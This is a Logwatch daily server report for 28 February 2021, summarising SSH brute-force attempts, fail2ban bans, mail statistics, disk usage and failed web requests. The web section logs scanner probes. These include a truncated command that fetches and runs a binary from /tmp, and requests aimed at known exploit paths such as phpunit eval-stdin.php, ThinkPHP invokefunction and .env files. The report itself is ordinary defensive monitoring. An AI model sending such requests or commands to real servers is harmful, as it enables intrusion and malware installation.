################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Mon Mar 1 04:42:13 2021
Date Range Processed: yesterday
( 2021-Feb-28 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [155:156]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 4 sites probed the server
161.35.230.3
167.71.102.181
42.229.215.178
61.219.11.153
Requests with error response codes
400 Bad Request
null: 5 Time(s)
/config/getuser?index=0: 2 Time(s)
/shell?cd+/tmp;rm+arm+arm7;wget+http:/\x5C ... +arm;./arm+jaws: 2 Time(s)
mstshash=Administr: 2 Time(s)
../../proc/: 1 Time(s)
/: 1 Time(s)
/sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/: 1 Time(s)
404 Not Found
/robots.txt: 36 Time(s)
/wp-login.php: 3 Time(s)
/protokolle/Protokoll_MV_2020_11_12_Muenchen.pdf: 2 Time(s)
/sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 2 Time(s)
/reader/1994-wi-reader_hb94.pdf: 1 Time(s)
/sites/all/libraries/elfinder/connectors/php/connector.php: 1 Time(s)
/sites/all/libraries/elfinder/src/connecto ... p/connector.php: 1 Time(s)
/sites/default/files/1982_WiSe_Stuttgart.pdf: 1 Time(s)
/sites/default/files/2006_SoSe_Dresden.pdf: 1 Time(s)
/stapf: 1 Time(s)
/wp-content/plugins/secure-file-manager/ve ... tor.minimal.php: 1 Time(s)
/xmlrpc.php: 1 Time(s)
/zapf/reader/%7CTagungsreader: 1 Time(s)
500 Internal Server Error
/: 39 Time(s)
/sitemap.txt: 5 Time(s)
/.env: 2 Time(s)
/atom.xml: 2 Time(s)
/robots.txt: 2 Time(s)
/sitemap_index.xml: 2 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/admin//config.php: 1 Time(s)
/api/jsonws/invoke: 1 Time(s)
/applications/updater/ver.json: 1 Time(s)
/console/: 1 Time(s)
/index.php?s=/Index/\x5Cthink\x5Capp/invok ... HelloThinkPHP21: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/se4Q: 1 Time(s)
/version.json: 1 Time(s)
/wp-content/plugins/wp-file-manager/readme.txt: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 198 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9 Miscellaneous warnings
17.810K Bytes accepted 18,237
17.810K Bytes sent via SMTP 18,237
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
76 Connections
8 Connections lost (inbound)
76 Disconnections
1 Removed from queue
1 Sent via SMTP
3 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Network Read Write Errors: 1
Disconnecting after too many authentication failures for user:
root : 52 Time(s)
Failed logins from:
Illegal users from:
undef: 78 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop47755p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################